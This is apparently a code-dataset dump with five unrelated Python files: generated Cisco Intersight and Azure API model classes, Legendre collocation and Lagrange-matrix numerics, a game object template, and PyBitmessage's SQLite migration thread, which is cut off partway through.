ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 7df9dfe7c3aa03fb3cb4bd2b2b287720e1754e3e | # coding: utf-8
"""
Cisco Intersight OpenAPI specification.
The Cisco Intersight OpenAPI specification.
OpenAPI spec version: 1.0.9-1461
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class HclHardwareCompatibilityProfile(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'object_type': 'str',
'driver_iso_url': 'str',
'error_code': 'str',
'id': 'str',
'os_vendor': 'str',
'os_version': 'str',
'processor_model': 'str',
'products': 'list[HclProduct]',
'server_model': 'str',
'server_revision': 'str',
'ucs_version': 'str',
'version_type': 'str'
}
attribute_map = {
'object_type': 'ObjectType',
'driver_iso_url': 'DriverIsoUrl',
'error_code': 'ErrorCode',
'id': 'Id',
'os_vendor': 'OsVendor',
'os_version': 'OsVersion',
'processor_model': 'ProcessorModel',
'products': 'Products',
'server_model': 'ServerModel',
'server_revision': 'ServerRevision',
'ucs_version': 'UcsVersion',
'version_type': 'VersionType'
}
def __init__(self, object_type=None, driver_iso_url=None, error_code='Success', id=None, os_vendor=None, os_version=None, processor_model=None, products=None, server_model=None, server_revision=None, ucs_version=None, version_type='UCSM'):
"""
HclHardwareCompatibilityProfile - a model defined in Swagger
"""
self._object_type = None
self._driver_iso_url = None
self._error_code = None
self._id = None
self._os_vendor = None
self._os_version = None
self._processor_model = None
self._products = None
self._server_model = None
self._server_revision = None
self._ucs_version = None
self._version_type = None
if object_type is not None:
self.object_type = object_type
if driver_iso_url is not None:
self.driver_iso_url = driver_iso_url
if error_code is not None:
self.error_code = error_code
if id is not None:
self.id = id
if os_vendor is not None:
self.os_vendor = os_vendor
if os_version is not None:
self.os_version = os_version
if processor_model is not None:
self.processor_model = processor_model
if products is not None:
self.products = products
if server_model is not None:
self.server_model = server_model
if server_revision is not None:
self.server_revision = server_revision
if ucs_version is not None:
self.ucs_version = ucs_version
if version_type is not None:
self.version_type = version_type
@property
def object_type(self):
"""
Gets the object_type of this HclHardwareCompatibilityProfile.
The concrete type of this complex type. The ObjectType property must be set explicitly by API clients when the type is ambiguous. In all other cases, the ObjectType is optional. The type is ambiguous when a managed object contains an array of nested documents, and the documents in the array are heterogeneous, i.e. the array can contain nested documents of different types.
:return: The object_type of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._object_type
@object_type.setter
def object_type(self, object_type):
"""
Sets the object_type of this HclHardwareCompatibilityProfile.
The concrete type of this complex type. The ObjectType property must be set explicitly by API clients when the type is ambiguous. In all other cases, the ObjectType is optional. The type is ambiguous when a managed object contains an array of nested documents, and the documents in the array are heterogeneous, i.e. the array can contain nested documents of different types.
:param object_type: The object_type of this HclHardwareCompatibilityProfile.
:type: str
"""
self._object_type = object_type
@property
def driver_iso_url(self):
"""
Gets the driver_iso_url of this HclHardwareCompatibilityProfile.
Url for the ISO with the drivers supported for the server.
:return: The driver_iso_url of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._driver_iso_url
@driver_iso_url.setter
def driver_iso_url(self, driver_iso_url):
"""
Sets the driver_iso_url of this HclHardwareCompatibilityProfile.
Url for the ISO with the drivers supported for the server.
:param driver_iso_url: The driver_iso_url of this HclHardwareCompatibilityProfile.
:type: str
"""
self._driver_iso_url = driver_iso_url
@property
def error_code(self):
"""
Gets the error_code of this HclHardwareCompatibilityProfile.
Error code indicating the compatibility status.
:return: The error_code of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._error_code
@error_code.setter
def error_code(self, error_code):
"""
Sets the error_code of this HclHardwareCompatibilityProfile.
Error code indicating the compatibility status.
:param error_code: The error_code of this HclHardwareCompatibilityProfile.
:type: str
"""
allowed_values = ["Success", "Unknown", "UnknownServer", "InvalidUcsVersion", "ProcessorNotSupported", "OSNotSupported", "OSUnknown", "UCSVersionNotSupported", "UcsVersionServerOSCombinationNotSupported", "ProductUnknown", "ProductNotSupported", "DriverNameNotSupported", "FirmwareVersionNotSupported", "DriverVersionNotSupported", "FirmwareVersionDriverVersionCombinationNotSupported", "FirmwareVersionAndDriverVersionNotSupported", "FirmwareVersionAndDriverNameNotSupported", "InternalError", "MarshallingError", "Exempted"]
if error_code not in allowed_values:
raise ValueError(
"Invalid value for `error_code` ({0}), must be one of {1}"
.format(error_code, allowed_values)
)
self._error_code = error_code
@property
def id(self):
"""
Gets the id of this HclHardwareCompatibilityProfile.
Identifier of the hardware compatibility profile.
:return: The id of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this HclHardwareCompatibilityProfile.
Identifier of the hardware compatibility profile.
:param id: The id of this HclHardwareCompatibilityProfile.
:type: str
"""
self._id = id
@property
def os_vendor(self):
"""
Gets the os_vendor of this HclHardwareCompatibilityProfile.
Vendor of the Operating System running on the server.
:return: The os_vendor of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._os_vendor
@os_vendor.setter
def os_vendor(self, os_vendor):
"""
Sets the os_vendor of this HclHardwareCompatibilityProfile.
Vendor of the Operating System running on the server.
:param os_vendor: The os_vendor of this HclHardwareCompatibilityProfile.
:type: str
"""
self._os_vendor = os_vendor
@property
def os_version(self):
"""
Gets the os_version of this HclHardwareCompatibilityProfile.
Version of the Operating System running on the server.
:return: The os_version of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._os_version
@os_version.setter
def os_version(self, os_version):
"""
Sets the os_version of this HclHardwareCompatibilityProfile.
Version of the Operating System running on the server.
:param os_version: The os_version of this HclHardwareCompatibilityProfile.
:type: str
"""
self._os_version = os_version
@property
def processor_model(self):
"""
Gets the processor_model of this HclHardwareCompatibilityProfile.
Model of the processor present in the server.
:return: The processor_model of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._processor_model
@processor_model.setter
def processor_model(self, processor_model):
"""
Sets the processor_model of this HclHardwareCompatibilityProfile.
Model of the processor present in the server.
:param processor_model: The processor_model of this HclHardwareCompatibilityProfile.
:type: str
"""
self._processor_model = processor_model
@property
def products(self):
"""
Gets the products of this HclHardwareCompatibilityProfile.
List of the products (adapters/storage controllers) for which compatibility status needs to be checked.
:return: The products of this HclHardwareCompatibilityProfile.
:rtype: list[HclProduct]
"""
return self._products
@products.setter
def products(self, products):
"""
Sets the products of this HclHardwareCompatibilityProfile.
List of the products (adapters/storage controllers) for which compatibility status needs to be checked.
:param products: The products of this HclHardwareCompatibilityProfile.
:type: list[HclProduct]
"""
self._products = products
@property
def server_model(self):
"""
Gets the server_model of this HclHardwareCompatibilityProfile.
Model of the server as returned by UCSM/CIMC XML API.
:return: The server_model of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._server_model
@server_model.setter
def server_model(self, server_model):
"""
Sets the server_model of this HclHardwareCompatibilityProfile.
Model of the server as returned by UCSM/CIMC XML API.
:param server_model: The server_model of this HclHardwareCompatibilityProfile.
:type: str
"""
self._server_model = server_model
@property
def server_revision(self):
"""
Gets the server_revision of this HclHardwareCompatibilityProfile.
Revision of the server model.
:return: The server_revision of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._server_revision
@server_revision.setter
def server_revision(self, server_revision):
"""
Sets the server_revision of this HclHardwareCompatibilityProfile.
Revision of the server model.
:param server_revision: The server_revision of this HclHardwareCompatibilityProfile.
:type: str
"""
self._server_revision = server_revision
@property
def ucs_version(self):
"""
Gets the ucs_version of this HclHardwareCompatibilityProfile.
Version of the UCS software.
:return: The ucs_version of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._ucs_version
@ucs_version.setter
def ucs_version(self, ucs_version):
"""
Sets the ucs_version of this HclHardwareCompatibilityProfile.
Version of the UCS software.
:param ucs_version: The ucs_version of this HclHardwareCompatibilityProfile.
:type: str
"""
self._ucs_version = ucs_version
@property
def version_type(self):
"""
Gets the version_type of this HclHardwareCompatibilityProfile.
Type of the UCS version indicating whether it is a UCSM release vesion or a IMC release.
:return: The version_type of this HclHardwareCompatibilityProfile.
:rtype: str
"""
return self._version_type
@version_type.setter
def version_type(self, version_type):
"""
Sets the version_type of this HclHardwareCompatibilityProfile.
Type of the UCS version indicating whether it is a UCSM release vesion or a IMC release.
:param version_type: The version_type of this HclHardwareCompatibilityProfile.
:type: str
"""
allowed_values = ["UCSM", "IMC"]
if version_type not in allowed_values:
raise ValueError(
"Invalid value for `version_type` ({0}), must be one of {1}"
.format(version_type, allowed_values)
)
self._version_type = version_type
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, HclHardwareCompatibilityProfile):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
py | 7df9e00b041cb908c151a38f1b12a51f40b60696 | from enum import auto, Enum
from typing import List
import numpy as np
from numpy.polynomial.legendre import Legendre
from numpy.polynomial.polynomial import Polynomial
from scipy.interpolate import lagrange
class CollocationEnum(Enum):
"""CollocationEnum Scheme enumeration.
A collcation scheme consists of two main ingredients:
- the position of the collocation point
- the interpolating polynomial used
See: https://hal.archives-ouvertes.fr/hal-01615132/document
"""
LG = auto()
LGR = auto()
LGL = auto()
# FIXME: this is really just getting the Legendere root points, not collocation points
def get_collocation_points(
num_points: int, scheme: CollocationEnum = CollocationEnum.LGR
) -> np.ndarray:
"""Retrieve 1D collocation points for a given scheme in the interval of [-1, 1]
Note: Some methods include the end points of -1, 1, while some others don't.
"""
if not isinstance(scheme, CollocationEnum):
raise TypeError(
f"Expected scheme to be of type {CollocationEnum}, but got {type(scheme)} instead"
)
# TODO: would this be different for different schemes?
assert num_points >= 1
# TODO: perhaps we should just combine everything into a Collocation Class
if scheme == CollocationEnum.LGR:
# root of Legendre polynomial, whrre P is a lgrange function
# P_{N-1} + P_N = 0, but flipped around zero to include t=1
coefficients = [0] * (num_points - 1) + [1, 1]
characteristic_polynomial = Legendre(coefficients)
# solve and flip
collocation_points = -characteristic_polynomial.roots()[::-1]
elif scheme == CollocationEnum.LG:
# roots of P_N = 0
coefficients = [0] * num_points + [1]
characteristic_polynomial = Legendre(coefficients)
collocation_points = characteristic_polynomial.roots()
elif scheme == CollocationEnum.LGL:
# roots of P_dot_{N-1} + [-1, 1]
coefficients = [0] * (num_points - 1) + [1]
characteristic_polynomial = Legendre(coefficients).deriv()
collocation_points = np.append(
np.insert(characteristic_polynomial.roots(), 0, -1), 1
)
else:
raise NotImplemented(scheme)
return collocation_points
def make_lagrange_polynomial(support: np.ndarray, index: int) -> Polynomial:
"""Create the i-th lagrange polynomial"""
weights = np.zeros_like(support)
weights[index] = 1
# NOTE: lagrange returns coef in decending power order, which is opposite to numpy
# Polynomials.
coefficients = lagrange(support, weights).coef[::-1]
return Polynomial(coefficients)
def make_lagrange_basis(support: np.ndarray) -> List[Polynomial]:
"""Create a list of lagrange basis of varying order on the same support."""
return [make_lagrange_polynomial(support, index) for index in range(len(support))]
def build_lagrange_differential_matrix(
support: np.ndarray, evaluation_points: np.ndarray
) -> np.ndarray:
"""Differential matrix for computing the derivative of a lagrange polynomial using
linear matrix vector multiplication"""
lagrange_basis = make_lagrange_basis(support)
polynomials = [
lagrange_polynomial.deriv() for lagrange_polynomial in lagrange_basis
]
return np.array([p(evaluation_points) for p in polynomials]).T
def build_lagrange_integration_matrix(
support: np.ndarray, evaluation_points: np.ndarray
) -> np.ndarray:
"""Integration matrix for computing the definitive integral of a lagrange polynomial using
linear matrix vector multiplication"""
lagrange_basis = make_lagrange_basis(support)
polynomials = [
lagrange_polynomial.integ() for lagrange_polynomial in lagrange_basis
]
# NOTE: eq39, the integral polynomial is a definite integral, so need to call the
# integral twice to remove the part for tau < support[0]
return np.array([p(evaluation_points) - p(support[0]) for p in polynomials]).T
|
py | 7df9e1226a64805f3703e0af4957d610068ca728 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayIPConfiguration(SubResource):
"""IP configuration of an application gateway. Currently 1 public and 1
private IP configuration is allowed.
:param id: Resource ID.
:type id: str
:param subnet: Reference of the subnet resource. A subnet from where
application gateway gets its private address.
:type subnet: :class:`SubResource
<azure.mgmt.network.v2016_09_01.models.SubResource>`
:param provisioning_state: Provisioning state of the application gateway
subnet resource. Possible values are: 'Updating', 'Deleting', and
'Failed'.
:type provisioning_state: str
:param name: Name of the resource that is unique within a resource group.
This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'subnet': {'key': 'properties.subnet', 'type': 'SubResource'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, id=None, subnet=None, provisioning_state=None, name=None, etag=None):
super(ApplicationGatewayIPConfiguration, self).__init__(id=id)
self.subnet = subnet
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
|
py | 7df9e239b28b5d487e6b237dc3bf415f531fbd66 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/item/shared_craftable_bug_habitat.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result |
py | 7df9e253ac23ade41d6e2bb68f94b94964ccd8a3 | """
sqlThread is defined here
"""
import os
import shutil # used for moving the messages.dat file
import sqlite3
import sys
import threading
import time
try:
import helper_sql
import helper_startup
import paths
import queues
import state
from addresses import encodeAddress
from bmconfigparser import config, config_ready
from debug import logger
from tr import _translate
except ImportError:
from . import helper_sql, helper_startup, paths, queues, state
from .addresses import encodeAddress
from .bmconfigparser import config, config_ready
from .debug import logger
from .tr import _translate
class sqlThread(threading.Thread):
"""A thread for all SQL operations"""
def __init__(self):
threading.Thread.__init__(self, name="SQL")
def run(self): # pylint: disable=too-many-locals, too-many-branches, too-many-statements
"""Process SQL queries from `.helper_sql.sqlSubmitQueue`"""
helper_sql.sql_available = True
config_ready.wait()
self.conn = sqlite3.connect(state.appdata + 'messages.dat')
self.conn.text_factory = str
self.cur = self.conn.cursor()
self.cur.execute('PRAGMA secure_delete = true')
# call create_function for encode address
self.create_function()
try:
self.cur.execute(
'''CREATE TABLE inbox (msgid blob, toaddress text, fromaddress text, subject text,'''
''' received text, message text, folder text, encodingtype int, read bool, sighash blob,'''
''' UNIQUE(msgid) ON CONFLICT REPLACE)''')
self.cur.execute(
'''CREATE TABLE sent (msgid blob, toaddress text, toripe blob, fromaddress text, subject text,'''
''' message text, ackdata blob, senttime integer, lastactiontime integer,'''
''' sleeptill integer, status text, retrynumber integer, folder text, encodingtype int, ttl int)''')
self.cur.execute(
'''CREATE TABLE subscriptions (label text, address text, enabled bool)''')
self.cur.execute(
'''CREATE TABLE addressbook (label text, address text, UNIQUE(address) ON CONFLICT IGNORE)''')
self.cur.execute(
'''CREATE TABLE blacklist (label text, address text, enabled bool)''')
self.cur.execute(
'''CREATE TABLE whitelist (label text, address text, enabled bool)''')
self.cur.execute(
'''CREATE TABLE pubkeys (address text, addressversion int, transmitdata blob, time int,'''
''' usedpersonally text, UNIQUE(address) ON CONFLICT REPLACE)''')
self.cur.execute(
'''CREATE TABLE inventory (hash blob, objecttype int, streamnumber int, payload blob,'''
''' expirestime integer, tag blob, UNIQUE(hash) ON CONFLICT REPLACE)''')
self.cur.execute(
'''INSERT INTO subscriptions VALUES'''
'''('Bitmessage new releases/announcements','BM-GtovgYdgs7qXPkoYaRgrLFuFKz1SFpsw',1)''')
self.cur.execute(
'''CREATE TABLE settings (key blob, value blob, UNIQUE(key) ON CONFLICT REPLACE)''')
self.cur.execute('''INSERT INTO settings VALUES('version','11')''')
self.cur.execute('''INSERT INTO settings VALUES('lastvacuumtime',?)''', (
int(time.time()),))
self.cur.execute(
'''CREATE TABLE objectprocessorqueue'''
''' (objecttype int, data blob, UNIQUE(objecttype, data) ON CONFLICT REPLACE)''')
self.conn.commit()
logger.info('Created messages database file')
except Exception as err:
if str(err) == 'table inbox already exists':
logger.debug('Database file already exists.')
else:
sys.stderr.write(
'ERROR trying to create database file (message.dat). Error message: %s\n' % str(err))
os._exit(0)
# If the settings version is equal to 2 or 3 then the
# sqlThread will modify the pubkeys table and change
# the settings version to 4.
settingsversion = config.getint(
'bitmessagesettings', 'settingsversion')
# People running earlier versions of PyBitmessage do not have the
# usedpersonally field in their pubkeys table. Let's add it.
if settingsversion == 2:
item = '''ALTER TABLE pubkeys ADD usedpersonally text DEFAULT 'no' '''
parameters = ''
self.cur.execute(item, parameters)
self.conn.commit()
settingsversion = 3
# People running earlier versions of PyBitmessage do not have the
# encodingtype field in their inbox and sent tables or the read field
# in the inbox table. Let's add them.
if settingsversion == 3:
item = '''ALTER TABLE inbox ADD encodingtype int DEFAULT '2' '''
parameters = ''
self.cur.execute(item, parameters)
item = '''ALTER TABLE inbox ADD read bool DEFAULT '1' '''
parameters = ''
self.cur.execute(item, parameters)
item = '''ALTER TABLE sent ADD encodingtype int DEFAULT '2' '''
parameters = ''
self.cur.execute(item, parameters)
self.conn.commit()
settingsversion = 4
config.set(
'bitmessagesettings', 'settingsversion', str(settingsversion))
config.save()
helper_startup.updateConfig()
# From now on, let us keep a 'version' embedded in the messages.dat
# file so that when we make changes to the database, the database
# version we are on can stay embedded in the messages.dat file. Let us
# check to see if the settings table exists yet.
item = '''SELECT name FROM sqlite_master WHERE type='table' AND name='settings';'''
parameters = ''
self.cur.execute(item, parameters)
if self.cur.fetchall() == []:
# The settings table doesn't exist. We need to make it.
logger.debug(
"In messages.dat database, creating new 'settings' table.")
self.cur.execute(
'''CREATE TABLE settings (key text, value blob, UNIQUE(key) ON CONFLICT REPLACE)''')
self.cur.execute('''INSERT INTO settings VALUES('version','1')''')
self.cur.execute('''INSERT INTO settings VALUES('lastvacuumtime',?)''', (
int(time.time()),))
logger.debug('In messages.dat database, removing an obsolete field from the pubkeys table.')
self.cur.execute(
'''CREATE TEMPORARY TABLE pubkeys_backup(hash blob, transmitdata blob, time int,'''
''' usedpersonally text, UNIQUE(hash) ON CONFLICT REPLACE);''')
self.cur.execute(
'''INSERT INTO pubkeys_backup SELECT hash, transmitdata, time, usedpersonally FROM pubkeys;''')
self.cur.execute('''DROP TABLE pubkeys''')
self.cur.execute(
'''CREATE TABLE pubkeys'''
''' (hash blob, transmitdata blob, time int, usedpersonally text, UNIQUE(hash) ON CONFLICT REPLACE)''')
self.cur.execute(
'''INSERT INTO pubkeys SELECT hash, transmitdata, time, usedpersonally FROM pubkeys_backup;''')
self.cur.execute('''DROP TABLE pubkeys_backup;''')
logger.debug(
'Deleting all pubkeys from inventory.'
' They will be redownloaded and then saved with the correct times.')
self.cur.execute(
'''delete from inventory where objecttype = 'pubkey';''')
logger.debug('replacing Bitmessage announcements mailing list with a new one.')
self.cur.execute(
'''delete from subscriptions where address='BM-BbkPSZbzPwpVcYZpU4yHwf9ZPEapN5Zx' ''')
self.cur.execute(
'''INSERT INTO subscriptions VALUES'''
'''('Bitmessage new releases/announcements','BM-GtovgYdgs7qXPkoYaRgrLFuFKz1SFpsw',1)''')
logger.debug('Commiting.')
self.conn.commit()
logger.debug('Vacuuming message.dat. You might notice that the file size gets much smaller.')
self.cur.execute(''' VACUUM ''')
# After code refactoring, the possible status values for sent messages
# have changed.
self.cur.execute(
'''update sent set status='doingmsgpow' where status='doingpow' ''')
self.cur.execute(
'''update sent set status='msgsent' where status='sentmessage' ''')
self.cur.execute(
'''update sent set status='doingpubkeypow' where status='findingpubkey' ''')
self.cur.execute(
'''update sent set status='broadcastqueued' where status='broadcastpending' ''')
self.conn.commit()
# Let's get rid of the first20bytesofencryptedmessage field in
# the inventory table.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
if int(self.cur.fetchall()[0][0]) == 2:
logger.debug(
'In messages.dat database, removing an obsolete field from'
' the inventory table.')
self.cur.execute(
'''CREATE TEMPORARY TABLE inventory_backup'''
'''(hash blob, objecttype text, streamnumber int, payload blob,'''
''' receivedtime integer, UNIQUE(hash) ON CONFLICT REPLACE);''')
self.cur.execute(
'''INSERT INTO inventory_backup SELECT hash, objecttype, streamnumber, payload, receivedtime'''
''' FROM inventory;''')
self.cur.execute('''DROP TABLE inventory''')
self.cur.execute(
'''CREATE TABLE inventory'''
''' (hash blob, objecttype text, streamnumber int, payload blob, receivedtime integer,'''
''' UNIQUE(hash) ON CONFLICT REPLACE)''')
self.cur.execute(
'''INSERT INTO inventory SELECT hash, objecttype, streamnumber, payload, receivedtime'''
''' FROM inventory_backup;''')
self.cur.execute('''DROP TABLE inventory_backup;''')
item = '''update settings set value=? WHERE key='version';'''
parameters = (3,)
self.cur.execute(item, parameters)
# Add a new column to the inventory table to store tags.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 1 or currentVersion == 3:
logger.debug(
'In messages.dat database, adding tag field to'
' the inventory table.')
item = '''ALTER TABLE inventory ADD tag blob DEFAULT '' '''
parameters = ''
self.cur.execute(item, parameters)
item = '''update settings set value=? WHERE key='version';'''
parameters = (4,)
self.cur.execute(item, parameters)
# Add a new column to the pubkeys table to store the address version.
# We're going to trash all of our pubkeys and let them be redownloaded.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 4:
self.cur.execute('''DROP TABLE pubkeys''')
self.cur.execute(
'''CREATE TABLE pubkeys (hash blob, addressversion int, transmitdata blob, time int,'''
'''usedpersonally text, UNIQUE(hash, addressversion) ON CONFLICT REPLACE)''')
self.cur.execute(
'''delete from inventory where objecttype = 'pubkey';''')
item = '''update settings set value=? WHERE key='version';'''
parameters = (5,)
self.cur.execute(item, parameters)
# Add a new table: objectprocessorqueue with which to hold objects
# that have yet to be processed if the user shuts down Bitmessage.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 5:
self.cur.execute('''DROP TABLE knownnodes''')
self.cur.execute(
'''CREATE TABLE objectprocessorqueue'''
''' (objecttype text, data blob, UNIQUE(objecttype, data) ON CONFLICT REPLACE)''')
item = '''update settings set value=? WHERE key='version';'''
parameters = (6,)
self.cur.execute(item, parameters)
# changes related to protocol v3
# In table inventory and objectprocessorqueue, objecttype is now
# an integer (it was a human-friendly string previously)
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 6:
logger.debug(
'In messages.dat database, dropping and recreating'
' the inventory table.')
self.cur.execute('''DROP TABLE inventory''')
self.cur.execute(
'''CREATE TABLE inventory'''
''' (hash blob, objecttype int, streamnumber int, payload blob, expirestime integer,'''
''' tag blob, UNIQUE(hash) ON CONFLICT REPLACE)''')
self.cur.execute('''DROP TABLE objectprocessorqueue''')
self.cur.execute(
'''CREATE TABLE objectprocessorqueue'''
''' (objecttype int, data blob, UNIQUE(objecttype, data) ON CONFLICT REPLACE)''')
item = '''update settings set value=? WHERE key='version';'''
parameters = (7,)
self.cur.execute(item, parameters)
logger.debug(
'Finished dropping and recreating the inventory table.')
# The format of data stored in the pubkeys table has changed. Let's
# clear it, and the pubkeys from inventory, so that they'll
# be re-downloaded.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 7:
logger.debug(
'In messages.dat database, clearing pubkeys table'
' because the data format has been updated.')
self.cur.execute(
'''delete from inventory where objecttype = 1;''')
self.cur.execute(
'''delete from pubkeys;''')
# Any sending messages for which we *thought* that we had
# the pubkey must be rechecked.
self.cur.execute(
'''UPDATE sent SET status='msgqueued' WHERE status='doingmsgpow' or status='badkey';''')
query = '''update settings set value=? WHERE key='version';'''
parameters = (8,)
self.cur.execute(query, parameters)
logger.debug('Finished clearing currently held pubkeys.')
# Add a new column to the inbox table to store the hash of
# the message signature. We'll use this as temporary message UUID
# in order to detect duplicates.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 8:
logger.debug(
'In messages.dat database, adding sighash field to'
' the inbox table.')
item = '''ALTER TABLE inbox ADD sighash blob DEFAULT '' '''
parameters = ''
self.cur.execute(item, parameters)
item = '''update settings set value=? WHERE key='version';'''
parameters = (9,)
self.cur.execute(item, parameters)
# We'll also need a `sleeptill` field and a `ttl` field. Also we
# can combine the pubkeyretrynumber and msgretrynumber into one.
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 9:
logger.info(
'In messages.dat database, making TTL-related changes:'
' combining the pubkeyretrynumber and msgretrynumber'
' fields into the retrynumber field and adding the'
' sleeptill and ttl fields...')
self.cur.execute(
'''CREATE TEMPORARY TABLE sent_backup'''
''' (msgid blob, toaddress text, toripe blob, fromaddress text, subject text, message text,'''
''' ackdata blob, lastactiontime integer, status text, retrynumber integer,'''
''' folder text, encodingtype int)''')
self.cur.execute(
'''INSERT INTO sent_backup SELECT msgid, toaddress, toripe, fromaddress,'''
''' subject, message, ackdata, lastactiontime,'''
''' status, 0, folder, encodingtype FROM sent;''')
self.cur.execute('''DROP TABLE sent''')
self.cur.execute(
'''CREATE TABLE sent'''
''' (msgid blob, toaddress text, toripe blob, fromaddress text, subject text, message text,'''
''' ackdata blob, senttime integer, lastactiontime integer, sleeptill int, status text,'''
''' retrynumber integer, folder text, encodingtype int, ttl int)''')
self.cur.execute(
'''INSERT INTO sent SELECT msgid, toaddress, toripe, fromaddress, subject, message, ackdata,'''
''' lastactiontime, lastactiontime, 0, status, 0, folder, encodingtype, 216000 FROM sent_backup;''')
self.cur.execute('''DROP TABLE sent_backup''')
logger.info('In messages.dat database, finished making TTL-related changes.')
logger.debug('In messages.dat database, adding address field to the pubkeys table.')
# We're going to have to calculate the address for each row in the pubkeys
# table. Then we can take out the hash field.
self.cur.execute('''ALTER TABLE pubkeys ADD address text DEFAULT '' ;''')
# replica for loop to update hashed address
self.cur.execute('''UPDATE pubkeys SET address=(enaddr(pubkeys.addressversion, 1, hash)); ''')
# Now we can remove the hash field from the pubkeys table.
self.cur.execute(
'''CREATE TEMPORARY TABLE pubkeys_backup'''
''' (address text, addressversion int, transmitdata blob, time int,'''
''' usedpersonally text, UNIQUE(address) ON CONFLICT REPLACE)''')
self.cur.execute(
'''INSERT INTO pubkeys_backup'''
''' SELECT address, addressversion, transmitdata, time, usedpersonally FROM pubkeys;''')
self.cur.execute('''DROP TABLE pubkeys''')
self.cur.execute(
'''CREATE TABLE pubkeys'''
''' (address text, addressversion int, transmitdata blob, time int, usedpersonally text,'''
''' UNIQUE(address) ON CONFLICT REPLACE)''')
self.cur.execute(
'''INSERT INTO pubkeys SELECT'''
''' address, addressversion, transmitdata, time, usedpersonally FROM pubkeys_backup;''')
self.cur.execute('''DROP TABLE pubkeys_backup''')
logger.debug(
'In messages.dat database, done adding address field to the pubkeys table'
' and removing the hash field.')
self.cur.execute('''update settings set value=10 WHERE key='version';''')
# Update the address colunm to unique in addressbook table
item = '''SELECT value FROM settings WHERE key='version';'''
parameters = ''
self.cur.execute(item, parameters)
currentVersion = int(self.cur.fetchall()[0][0])
if currentVersion == 10:
logger.debug(
'In messages.dat database, updating address column to UNIQUE'
' in the addressbook table.')
self.cur.execute(
'''ALTER TABLE addressbook RENAME TO old_addressbook''')
self.cur.execute(
'''CREATE TABLE addressbook'''
''' (label text, address text, UNIQUE(address) ON CONFLICT IGNORE)''')
self.cur.execute(
'''INSERT INTO addressbook SELECT label, address FROM old_addressbook;''')
self.cur.execute('''DROP TABLE old_addressbook''')
self.cur.execute('''update settings set value=11 WHERE key='version';''')
# Are you hoping to add a new option to the keys.dat file of existing
# Bitmessage users or modify the SQLite database? Add it right
# above this line!
try:
testpayload = '\x00\x00'
t = ('1234', 1, testpayload, '12345678', 'no')
self.cur.execute('''INSERT INTO pubkeys VALUES(?,?,?,?,?)''', t)
self.conn.commit()
self.cur.execute(
'''SELECT transmitdata FROM pubkeys WHERE address='1234' ''')
queryreturn = self.cur.fetchall()
for row in queryreturn:
transmitdata, = row
